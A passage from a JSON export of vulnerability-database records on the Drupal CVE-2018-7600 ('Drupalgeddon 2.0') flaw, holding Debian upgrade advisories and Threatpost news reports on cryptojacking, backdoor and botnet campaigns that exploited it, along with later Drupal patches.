advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2018-03-28T22:42:59", "published": "2018-03-28T22:42:59", "id": "DEBIAN:DLA-1325-1:E895C", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201803/msg00028.html", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:32", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4156-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7600\nDebian Bug : 894259\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-03-28T22:32:00", "published": "2018-03-28T22:32:00", "id": "DEBIAN:DSA-4156-1:C1814", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00082.html", "title": "[SECURITY] [DSA 4156-1] drupal7 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:00", "bulletinFamily": "info", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "modified": "2018-05-03T16:57:19", "published": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:52:31", "bulletinFamily": "info", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "modified": "2018-06-05T18:24:29", "published": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "bulletinFamily": "info", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "modified": "2018-05-07T16:16:20", "published": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-07T08:18:49", "bulletinFamily": "info", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigating to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a users\u2019 access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows and external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users to visiting third party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "modified": "2018-10-20T17:09:46", "published": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T07:11:44", "bulletinFamily": "info", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than More than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d A Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "modified": "2018-11-19T16:20:59", "published": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-23T05:27:29", "bulletinFamily": "info", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "modified": "2018-03-29T15:58:28", "published": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "bulletinFamily": "info", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would 